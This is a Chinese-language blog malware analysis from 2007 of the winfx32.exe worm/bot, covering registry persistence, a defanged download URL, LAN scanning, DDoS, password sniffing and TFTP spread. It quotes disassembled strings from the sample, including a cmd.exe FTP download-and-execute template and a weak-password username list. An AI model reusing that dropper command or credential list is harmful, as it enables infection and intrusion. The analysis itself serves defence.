查看文章 |
[原创]劣性病毒分析报告:winfx32.exe/winnt.bat
2007-05-28 22:52
样本来自;http://bbs.kafan.cn/viewthread.php?tid=90302&extra=page%3D2&page=1 病毒名称:winfx32.exe(PS:就叫做超声波吧) 病毒大小:448,512 字节 加壳方式:未知 病毒预警:4级 病毒指纹: SHA-160 : 697E2D59FA689ECEBFE7CB94AD0E56279B7735CD 文章作者: [G-AVR]孤单每一天 文章地址:http://hi.baidu.com/renlangliu/blog/item/d73ed9805484cbd69123d99a.html 命名对照:
测试环境:winXPSP2 实机
病毒运行后拷贝自身到%systemroot%\system32\目录下,添加注册表启动项实现自启动,病毒运行中试图操作键盘。 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 名称:Windows Service Agent 类型:REG_SZ winfx32.exe HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices 连接:hxxp://alzahaby.com/vip/vrx6.exe下载其他病毒程序 病毒尝试用自身的端口扫描程序来扫描局域网端口,  使用net send命令发送恶意消息
 接受命令发动DDOS攻击
 使用FTP命令下载文件
___:00433EA8 s_VncD_DSS-Auth db 'VNC%d.%d %s: %s - [AuthBypass]',0
___:00433EA8 ; DATA XREF: ___:0040EDF6 o ___:00433EC7 align 4 ___:00433EC8 s_Rfb03d_03d db 'RFB %03d.%03d',0Ah,0 ; DATA XREF: ___:0040EC83 o ___:00433ED7 align 4 ___:00433ED8 word_433ED8 dw 1 ; DATA XREF: ___:0040EBFA r ___:00433ED8 ; sub_41B4FC+24 r ___:00433ED8 ; ___:0041B656 r ___:00433EDA align 4 ___:00433EDC ; char s_Cmd_exe[] ___:00433EDC s_Cmd_exe db 'cmd.exe',0 ; DATA XREF: ___:0040F01D o ___:00433EDC ; sub_41A153+21 o ___:00433EE4 s_EchoOpenSD>>O db 'echo open %s %d >> o&echo user 1 >>o &echo 1 >>o &echo get %s >>o &echo bye >>o &ftp -n -s' ___:00433EE4 ; DATA XREF: ___:0040F317 o ___:00433EE4 db ':o &del /F /Q o &%s',0Dh,0Ah,0 ___:00433F54 s_221GoodbyeHap db '221 Goodbye happy r00ting.',0Ah,0 ___:00433F54 ; DATA XREF: ___:0040F952 o ___:00433F70 s_425CanTOpenDa db '425 Can',27h,'t open data connection.',0Ah,0 PS:不知道为什么会有VNC,难道VNC又出了漏洞? 使用嗅探抓包原理来获取用户名和密码
___:00436EA8 s_IrcSniff db 'IRC sniff',0 ; DATA XREF: sub_412FC2+5 o
___:00436EB2 align 4 ___:00436EB4 s_Pass_0 db 'PASS ',0 ; DATA XREF: sub_413038+73 o ___:00436EBA align 4 ___:00436EBC s_User_2 db 'USER ',0 ; DATA XREF: sub_413038+62 o ___:00436EC2 align 4 ___:00436ED4 s_FtpSniff db 'FTP sniff',0 ; DATA XREF: sub_413038+5 o ___:00436F14 s_HttpSniff db 'HTTP sniff',0 ; DATA XREF: sub_4130BF+5 o ___:00436F50 s_VulnSniff db 'VULN sniff',0 ; DATA XREF: sub_413146+5 o
 结束以下进程:
  修改host文件(本机未实现)
  尝试对NT4.0/2000SP1-SP4/XPSP0SP进行TFTP传播
 对以下用户尝试若口令破解
___:00429898 s_Oracle db 'oracle',0
___:0042989F align 10h ___:004298A0 s_Dba db 'dba',0 ___:004298A4 s_Database db 'database',0 ___:004298AD align 10h ___:004298B0 s_Default db 'default',0 ___:004298B8 s_Guest_0 db 'guest',0 ___:004298BE align 10h ___:004298C0 s_Wwwadmin db 'wwwadmin',0 ___:004298C9 align 4 ___:004298CC s_Teacher db 'teacher',0 ___:004298D4 s_Student db 'student',0 ___:004298DC s_Owner db 'owner',0 ___:004298E2 align 4 ___:004298E4 s_Computer db 'computer',0 ___:004298ED align 10h ___:004298F0 s_Root db 'root',0 ___:004298F5 align 4 ___:004298F8 s_Staff db 'staff',0 ___:004298FE align 10h ___:00429900 s_Admin db 'admin',0 ___:00429906 align 4 ___:00429908 s_Admins db 'admins',0 ___:0042990F align 10h ___:00429910 s_Administrat db 'administrat',0 ___:0042991C s_Administrateu db 'administrateur',0 ___:0042992B align 4 ___:0042992C s_Administrador db 'administrador',0 ___:0042993A align 4 ___:0042993C s_Administrat_0 db 'administrator',0 密码为a-z多个常用单词,系统名称、数字、年月 病毒利用众多漏洞传播
 病毒运行后网速急速减慢,低配置计算机可能会出现死机现象,测试两分钟内开启线程将近150,截图:
 PS:发现该病毒目前流传甚广,杀完又中,写了一个批处理专杀程序,对病毒进行了清除、免疫,欢迎下载使用。
|
